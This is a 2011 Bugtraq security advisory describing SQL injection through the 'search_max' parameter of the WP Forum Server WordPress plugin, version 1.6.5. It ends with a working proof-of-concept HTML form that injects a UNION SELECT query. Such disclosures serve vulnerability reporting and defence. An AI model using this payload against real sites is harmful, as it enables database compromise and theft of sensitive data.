[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    HTB22851: SQL Injection in WP Forum Server wordpress plugin
From:       advisory () htbridge ! ch
Date:       2011-02-24 11:33:52
Message-ID: 201102241133.p1OBXqWH022247 () htbridge ! ch
[Download RAW message or body]

Vulnerability ID: HTB22851
Reference: http://www.htbridge.ch/advisory/sql_injection_in_wp_forum_server_wordpress_plugin_1.html
                
Product: WP Forum Server wordpress plugin
Vendor: VastHTML ( http://lucidcrew.com/ ) 
Vulnerable Version: 1.6.5
Vendor Notification: 10 February 2011 
Vulnerability Type: SQL Injection
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing \
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "index.php" script to properly \
sanitize user-supplied input in "search_max" variable. Attacker can alter queries to \
the application SQL database, execute arbitrary queries to the database, compromise \
the application, access or modify sensitive data, or exploit various vulnerabilities \
in the underlying SQL database.

The following PoC is available:


<form action="http://[host]/?page_id=[page_id]&vasthtmlaction=search" method="post" \
name="main" > <input type="hidden" name="search_words" value="123" />
<input type="hidden" name="search_submit" value="Search forums" />
<input type="hidden" name="search_user" value="*" />
<input type="hidden" name="search_min" value="0" />
<input type="hidden" name="search_max" value="9999 DAY) union select version(),2,3,4 \
-- " /> <input type="submit" value="search" name="submit" />
</form>


[prev in list] [next in list] [prev in thread] [next in thread]